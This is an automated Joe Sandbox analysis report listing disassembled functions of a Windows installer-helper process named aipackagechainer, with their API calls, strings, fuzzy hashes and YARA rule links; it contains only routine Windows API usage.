Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CreateDirectoryErrorLastPath
String ID: \\?\$\\?\UNC\
API String ID: 953296794-3019864461
Opcode ID: 35f6febc2b27046bac1d092222b12dc77e61866bef1b5b0fa2f1975c31ac88e1
Instruction ID: 3e465bb5f2146ccf0c12c175fa2fd9504a917db76f9986ddac79d24f2ee8d95d
Opcode Fuzzy Hash: 35f6febc2b27046bac1d092222b12dc77e61866bef1b5b0fa2f1975c31ac88e1
Instruction Fuzzy Hash: 2761E171E106099FDB00EFA8C889BEDBBF4EF59320F244299E415A72D1DB35A954CF90

Function 00238080 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

APIs

InitializeCriticalSection.KERNEL32(?,4938EAB5), ref: 002380BC

Part of subcall function 00213200: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,4938EAB5,00000000,0029B9F0,000000FF,?,?,002D3B80,?,0024D90C,80004005,4938EAB5,?,00000000), ref: 0021324A

EnterCriticalSection.KERNEL32(?,4938EAB5), ref: 002380C9
OutputDebugStringW.KERNEL32(?,?,00000000), ref: 00238175
LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,002A293D,000000FF), ref: 00238217

Strings

Logger::SetLogFile( %s ) while OLD path is:%s, xrefs: 002380FF

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CriticalSection$AllocateDebugEnterHeapInitializeLeaveOutputString
String ID: Logger::SetLogFile( %s ) while OLD path is:%s
API String ID: 117955849-1927537607
Opcode ID: 1b7b4f95679486fd4024e6dce7b82b5728f05d8107fdea112d1a3d3cfa365d60
Instruction ID: 81e351caa248274373aa66c06276cd9b9b1899aa817a75300c2149ddb9fa0605
Opcode Fuzzy Hash: 1b7b4f95679486fd4024e6dce7b82b5728f05d8107fdea112d1a3d3cfa365d60
Instruction Fuzzy Hash: 49511271910206DFDB00DF68C804BBEBBB5FF16314F144299EC59AB291EB319E26CB90

Function 00255C70 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 167synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF,4938EAB5), ref: 00255CA4

Part of subcall function 00233CC0: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,00000000,00000000,?,?,?,00240ECD,002BED9C,?,?,?,?,00000000), ref: 00233CD8
Part of subcall function 00233CC0: MultiByteToWideChar.KERNEL32(00000003,00000000,?,000000FF,4938EAB5,-00000001,?,?,?,00240ECD,002BED9C,?,?,?,?,00000000), ref: 00233D0A

Part of subcall function 00213200: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,4938EAB5,00000000,0029B9F0,000000FF,?,?,002D3B80,?,0024D90C,80004005,4938EAB5,?,00000000), ref: 0021324A

Strings

.jar, xrefs: 0025615C
*.*, xrefs: 00255D1A, 00255D2C, 00255D34
!, xrefs: 00255F58, 00256461
.pack, xrefs: 00256011

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ByteCharMultiWide$AllocateHeapObjectSingleWait
String ID: !$*.*$.jar$.pack
API String ID: 2019434529-2527187032
Opcode ID: 8a6b4e1a4985ab9e9e0911328131b879ced6b7045cdb3aff4bcadfa7889e90d9
Instruction ID: f3a50404a6a2050bdf71b1af921857c9bfc6d834406420943df85d27d6eb1148
Opcode Fuzzy Hash: 8a6b4e1a4985ab9e9e0911328131b879ced6b7045cdb3aff4bcadfa7889e90d9
Instruction Fuzzy Hash: D251B270A11A1A9FDB10DFA8C858BAEF7B4FF04311F104269E825EB291DB34D914CF94

Function 00243A20 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 160fileCOMMON

Download Yara Rule

APIs

DeleteFileW.KERNEL32(?), ref: 00243AFD
GetLastError.KERNEL32 ref: 00243B05
RemoveDirectoryW.KERNEL32(?), ref: 00243B6D
GetLastError.KERNEL32 ref: 00243B75

Strings

H, xrefs: 00243A85

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: ErrorLast$DeleteDirectoryFileRemove
String ID: H
API String ID: 50330452-2852464175
Opcode ID: 3b2c81c23ad01087b558b464f13c165f73952ac59606ccc32e278559033447d8
Instruction ID: cfa6153ade51a7af4a539c9c0a5556ac6e138d533b0e8785a6d2f99d683c12f1
Opcode Fuzzy Hash: 3b2c81c23ad01087b558b464f13c165f73952ac59606ccc32e278559033447d8
Instruction Fuzzy Hash: B751C531A1022ADFDF19DF94D888BDE77B0FF05304F1544A9D805AB251DB74AA18CFA1

Function 0025C1F0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 90COMMON

Download Yara Rule

APIs

FlushFileBuffers.KERNEL32(?,?,00000000,?,?,?,00000000), ref: 0025C228
GetFileSize.KERNEL32(?,00000000,?,00000000), ref: 0025C238

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

Strings

Local Network Server, xrefs: 0025C778, 0025C78A, 0025C794
HTTP/1.0, xrefs: 0025CE25
FTP Server, xrefs: 0025C9D8, 0025C9EA, 0025C9F4

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: File$BuffersFlushHeapProcessSize
String ID: FTP Server$HTTP/1.0$Local Network Server
API String ID: 3404093814-2627868275
Opcode ID: f83d7e392da8aefc874691fa1c983b66620d91e3a1a804e295a289214c203739
Instruction ID: f271b809e1f7c94d6cbe404475c6b8995210ba7d7f3597c748363744a5e0dd53
Opcode Fuzzy Hash: f83d7e392da8aefc874691fa1c983b66620d91e3a1a804e295a289214c203739
Instruction Fuzzy Hash: 86316F7190024A9FDB04DF68C844B9ABBF9FF05321F24866AEC25D7291E770DE14CB94

Function 00224420 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 74libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(combase.dll,RoOriginateLanguageException), ref: 00224462
GetProcAddress.KERNEL32(00000000,combase.dll), ref: 00224468
GetErrorInfo.OLEAUT32(00000000,00000000), ref: 0022449A

Strings

combase.dll, xrefs: 0022445D
RoOriginateLanguageException, xrefs: 00224458

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AddressErrorInfoLibraryLoadProc
String ID: RoOriginateLanguageException$combase.dll
API String ID: 1186719886-3996158991
Opcode ID: 7744c7cecf7da4aa594d4ddfe7631ac821c2537246eb8445b447b2d4173c2697
Instruction ID: 41fc70a0dbe65229e40d8df88249a1945d752d123cd827a565c5b8c98a2b0672
Opcode Fuzzy Hash: 7744c7cecf7da4aa594d4ddfe7631ac821c2537246eb8445b447b2d4173c2697
Instruction Fuzzy Hash: 71317E7191021AAFDB10EFE4D846BEEBBB4FB05304F104229E854A33C0DBB45A54CB91

Function 0028A7B7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,4938EAB5,?,?,00000000,002ACB25,000000FF,?,0028A747,?,?,0028A71B,?), ref: 0028A7EC
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 0028A7FE
FreeLibrary.KERNEL32(00000000,?,00000000,002ACB25,000000FF,?,0028A747,?,?,0028A71B,?), ref: 0028A820

Strings

CorExitProcess, xrefs: 0028A7F6
mscoree.dll, xrefs: 0028A7E5

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 7d219448c06539ee058de650f759940b067a88960b0cbaced876c8146c501ac3
Instruction ID: 9651978cb939e9ffc29c50dbfc6c1ea8a7eab919dadab652dfb40e41ae1883a6
Opcode Fuzzy Hash: 7d219448c06539ee058de650f759940b067a88960b0cbaced876c8146c501ac3
Instruction Fuzzy Hash: 96016236910616ABDF119F50DC09BBEBBB8FB09B55F01452AE821A22D0DF749D11CB91

Function 0025FF10 Relevance: 7.7, APIs: 5, Instructions: 217windowCOMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 0025FF36
IsWindowVisible.USER32(?), ref: 0025FF81
SendMessageW.USER32(?,0000000B,00000000,00000000), ref: 0025FF97
SendMessageW.USER32(?,0000000B,00000001,00000000), ref: 00260190
RedrawWindow.USER32(?,00000000,00000000,00000185), ref: 002601A1

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$MessageSend$LongRedrawVisible
String ID:
API String ID: 554559110-0
Opcode ID: e42cd4fc9c06d9cb6e82a132979252ff570453c38e0040d55bad8a0a39146643
Instruction ID: fe6eaf4df923bcbbc582c8f7749b3aa22eebe4b0fcf11f2b49a1a82d33d42e19
Opcode Fuzzy Hash: e42cd4fc9c06d9cb6e82a132979252ff570453c38e0040d55bad8a0a39146643
Instruction Fuzzy Hash: C1814671A183119FD710CF18C880B1AFBF2BF89750F15895EF999A72A0D771E8958F82

Function 0028F9FF Relevance: 7.7, APIs: 5, Instructions: 202COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 0028FA86
__alloca_probe_16.LIBCMT ref: 0028FB47
__freea.LIBCMT ref: 0028FBAE

Part of subcall function 0028D420: HeapAlloc.KERNEL32(00000000,00000000,0028B157,?,0028F8F8,?,00000000,?,00287131,00000000,0028B157,00000000,?,?,?,0028AF51), ref: 0028D452

__freea.LIBCMT ref: 0028FBC3
__freea.LIBCMT ref: 0028FBD3

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: b8ed6680d290e2d485d8c5f7bdeb9bad2d8174fc7c6c1fe3c26f56559cc98525
Instruction ID: f86a1f4f80752cfd2b2cfabd6efaeca6978c006c4be9285d2c402c6bfccc1df9
Opcode Fuzzy Hash: b8ed6680d290e2d485d8c5f7bdeb9bad2d8174fc7c6c1fe3c26f56559cc98525
Instruction Fuzzy Hash: E751A376622207AFEB65BE64CD91EBB37A9EF48354B254139FC08D6191E770DC308760

Function 0025C8E0 Relevance: 7.7, APIs: 5, Instructions: 200COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: HeapProcess
String ID:
API String ID: 54951025-0
Opcode ID: 58e60a25472d2c521fd1bf2419f322638b2c573ed349bc08ee11b7450a8c493f
Instruction ID: c4125b2ccc8195a9a2bf6e657d4326c4cf77fa04f9479ed9b168804dfa626c92
Opcode Fuzzy Hash: 58e60a25472d2c521fd1bf2419f322638b2c573ed349bc08ee11b7450a8c493f
Instruction Fuzzy Hash: 72816B71901309DFDB11CF68C888B9EBBB5FF49325F248299E815AB391E7748924CF94

Function 00256C60 Relevance: 7.7, APIs: 5, Instructions: 166threadsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventW.KERNEL32(00000000,00000000,00000000,00000000,4938EAB5), ref: 00256CA0
CreateThread.KERNEL32(00000000,00000000,00257010,?,00000000,?), ref: 00256CD6
WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?,4938EAB5), ref: 00256DE0
GetExitCodeThread.KERNEL32(00000000,?,?,00000000,?,4938EAB5), ref: 00256DEB
CloseHandle.KERNEL32(00000000,?,00000000,?,4938EAB5), ref: 00256E0B

Part of subcall function 00213200: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,4938EAB5,00000000,0029B9F0,000000FF,?,?,002D3B80,?,0024D90C,80004005,4938EAB5,?,00000000), ref: 0021324A

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CreateThread$AllocateCloseCodeEventExitHandleHeapObjectSingleWait
String ID:
API String ID: 978852114-0
Opcode ID: d80b807cdec9acebbc5dded5cc6fca7884b3228b056d6e730c00afb0b8143839
Instruction ID: 1ec94902a5112cc6a5ca25e04313e625c4dde392699b288e21853f3d27611665
Opcode Fuzzy Hash: d80b807cdec9acebbc5dded5cc6fca7884b3228b056d6e730c00afb0b8143839
Instruction Fuzzy Hash: F8515774A113199FCB20CF68D888BAABBF5FF09311F258659E916A7361D730A814CB60

Function 0025F7C0 Relevance: 7.7, APIs: 5, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 00213540: GetProcessHeap.KERNEL32 ref: 00213595

SetWindowTextW.USER32(00000000,002AA475), ref: 0025F84F
GetDlgItem.USER32(00000000,0000042B), ref: 0025F8A7
SetWindowTextW.USER32(00000000,00000000), ref: 0025F8AE
GetDlgItem.USER32(?,00000001), ref: 0025F8BB
EnableWindow.USER32(00000000,00000000), ref: 0025F8C0

Part of subcall function 00248840: GetWindowLongW.USER32(?,000000F0), ref: 00248887
Part of subcall function 00248840: GetParent.USER32 ref: 0024889D
Part of subcall function 00248840: GetWindowRect.USER32(?,?), ref: 002488A8
Part of subcall function 00248840: GetParent.USER32(?), ref: 002488B0
Part of subcall function 00248840: GetClientRect.USER32(00000000,?), ref: 002488BF
Part of subcall function 00248840: GetClientRect.USER32(?,?), ref: 002488C8
Part of subcall function 00248840: MapWindowPoints.USER32(00000002,00000000,?,00000002), ref: 002488D4

Part of subcall function 0025FA90: GetWindowLongW.USER32(?,000000F0), ref: 0025FABD
Part of subcall function 0025FA90: GetWindowLongW.USER32(?,000000F0), ref: 0025FAD2
Part of subcall function 0025FA90: SetWindowLongW.USER32(?,000000F0,00000000), ref: 0025FAE9
Part of subcall function 0025FA90: GetWindowLongW.USER32(?,000000EC), ref: 0025FB02
Part of subcall function 0025FA90: SetWindowLongW.USER32(?,000000EC,00000000), ref: 0025FB16
Part of subcall function 0025FA90: SendMessageW.USER32(?,0000007F,00000000,00000000), ref: 0025FB24
Part of subcall function 0025FA90: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0025FB37
Part of subcall function 0025FA90: IsWindow.USER32(00000000), ref: 0025FB52
Part of subcall function 0025FA90: DestroyWindow.USER32(00000000), ref: 0025FB6E
Part of subcall function 0025FA90: GetClientRect.USER32(?,?), ref: 0025FBC6

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$Long$Rect$Client$ItemMessageParentSendText$DestroyEnableHeapPointsProcess
String ID:
API String ID: 654977508-0
Opcode ID: 33bb765629c8bae1ed77bdd604131e17351392a88b69f4e45e6c2cd3da25cac1
Instruction ID: 0844c9d81c838eeb025ae719d2ba6ca612e3f60c3b6675c9618358da69601a04
Opcode Fuzzy Hash: 33bb765629c8bae1ed77bdd604131e17351392a88b69f4e45e6c2cd3da25cac1
Instruction Fuzzy Hash: 4F519E3090060A9FDB10DFA8CD48B5EFBB5FF09315F1482A9E815AB2A1DB349D15CF90

Function 00232D30 Relevance: 7.6, APIs: 6, Instructions: 106memoryCOMMON

Download Yara Rule

APIs

LocalFree.KERNEL32(00000000,80004005), ref: 00232D49
LocalFree.KERNEL32(?,80004005), ref: 00232D59
GetLastError.KERNEL32(?,80004005), ref: 00232D97
LocalAlloc.KERNEL32(00000040,00000014,?,80004005), ref: 00232DD6
GetLastError.KERNEL32(?,00000000,?,80004005), ref: 00232DF0
LocalFree.KERNEL32(?,?,00000000,?,80004005), ref: 00232E01

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Local$Free$ErrorLast$Alloc
String ID:
API String ID: 3879364810-0
Opcode ID: 3eba3c59b0b320386873ee801bb6acab12a14e52599e33f822c165b197d0b876
Instruction ID: fcd704f9ba10ea1ae0ea2f1f704b177078c724fb3251039cd7e5f3910c3c2338
Opcode Fuzzy Hash: 3eba3c59b0b320386873ee801bb6acab12a14e52599e33f822c165b197d0b876
Instruction Fuzzy Hash: 743135B06147069FEB20DF75E848B5BB7E8FF44711F00492EE946D2250EB78E9198BA1

Function 00258FAB Relevance: 7.6, APIs: 5, Instructions: 65COMMON

Download Yara Rule

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 00258FC0
GetWindowLongW.USER32(?,000000FC), ref: 00258FD5
CallWindowProcW.USER32(?,?,00000082,?,?), ref: 00258FEB
GetWindowLongW.USER32(?,000000FC), ref: 00259005
SetWindowLongW.USER32(?,000000FC,?), ref: 00259015

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Window$Long$CallProc
String ID:
API String ID: 513923721-0
Opcode ID: c1a6fb69075972c852abf36ffd44824e5b95f75d5c8eff28a73c17daa5d2f3c6
Instruction ID: c5a0c69d2588053c0e65c3c5cae9f16aaafa0396e0932054d8c981a8cdf37c36
Opcode Fuzzy Hash: c1a6fb69075972c852abf36ffd44824e5b95f75d5c8eff28a73c17daa5d2f3c6
Instruction Fuzzy Hash: 3F212971104700EFCB20AF19DC84927BBF5FB89721B104E1EF99A836A1C732E8959F50

Function 0027C4ED Relevance: 7.5, APIs: 5, Instructions: 37COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(002D7FD4,00000000,?,00213657,002D88D0,002ACD30), ref: 0027C4F7
LeaveCriticalSection.KERNEL32(002D7FD4,?,00213657,002D88D0,002ACD30), ref: 0027C52A
RtlWakeAllConditionVariable.NTDLL ref: 0027C5A1
SetEvent.KERNEL32(?,002D88D0,002ACD30), ref: 0027C5AB
ResetEvent.KERNEL32(?,002D88D0,002ACD30), ref: 0027C5B7

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: CriticalEventSection$ConditionEnterLeaveResetVariableWake
String ID:
API String ID: 3916383385-0
Opcode ID: bec305f182bb960baeac289a3ce0bd3e36f633ae6175af173d62fb9813a7b952
Instruction ID: 2b22123aa25b9d1ccb9ec54e2dc461bac594717ef01f45321c74cbfbc588f63e
Opcode Fuzzy Hash: bec305f182bb960baeac289a3ce0bd3e36f633ae6175af173d62fb9813a7b952
Instruction Fuzzy Hash: 1801F63591A520DFCB15AF18FC4CA987BA9FB4A712702406BE905A3720DB792D128BD4

Function 00238F50 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 226COMMON

Download Yara Rule

APIs

Part of subcall function 0023D1A0: SHGetSpecialFolderLocation.SHELL32(00000000,00000023,?,?,?,?,002D8AF4), ref: 0023D1B0
Part of subcall function 0023D1A0: LoadLibraryW.KERNEL32(Shell32.dll,?,?,002D8AF4), ref: 0023D1C3
Part of subcall function 0023D1A0: GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathW), ref: 0023D1D3

PathFileExistsW.SHLWAPI(?,ADVINST_LOGS,0000000C,002D8AF4), ref: 00239038

Part of subcall function 00213200: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,4938EAB5,00000000,0029B9F0,000000FF,?,?,002D3B80,?,0024D90C,80004005,4938EAB5,?,00000000), ref: 0021324A

Strings

Everyone, xrefs: 00239054
ADVINST_LOGS, xrefs: 0023902B

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: AddressAllocateExistsFileFolderHeapLibraryLoadLocationPathProcSpecial
String ID: ADVINST_LOGS$Everyone
API String ID: 3321256476-3921853867
Opcode ID: 186d03ca7135fbad6a55d08b168c82e53cc11b8c21ce90f2340739572cdb4276
Instruction ID: df33918bd81c8bf27ea2b3d215b905176197867bcad1dacff057bd7af33821b9
Opcode Fuzzy Hash: 186d03ca7135fbad6a55d08b168c82e53cc11b8c21ce90f2340739572cdb4276
Instruction Fuzzy Hash: 199100B091160ADFDB00DFA8C949BEEBBB4EF15314F248158E805BB291DBB55E54CFA0

Function 00231D80 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 225COMMON

Download Yara Rule

APIs

PathIsUNCW.SHLWAPI(-00000001,?,00000000,?,4938EAB5,?,?), ref: 00231EA1

Strings

\\?\, xrefs: 00231F96, 00231FEE, 00231FF3
*.*, xrefs: 00231D94
\\?\UNC\, xrefs: 00231EC3, 00231F80

Memory Dump Source

Source File: 00000003.00000002.1913377341.0000000000211000.00000020.00000001.01000000.00000003.sdmp, Offset: 00210000, based on PE: true

Associated: 00000003.00000002.1913258747.0000000000210000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913707951.00000000002AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1913766661.00000000002D6000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.1914420652.00000000002DE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_210000_aipackagechainer.jbxd

Similarity

API ID: Path
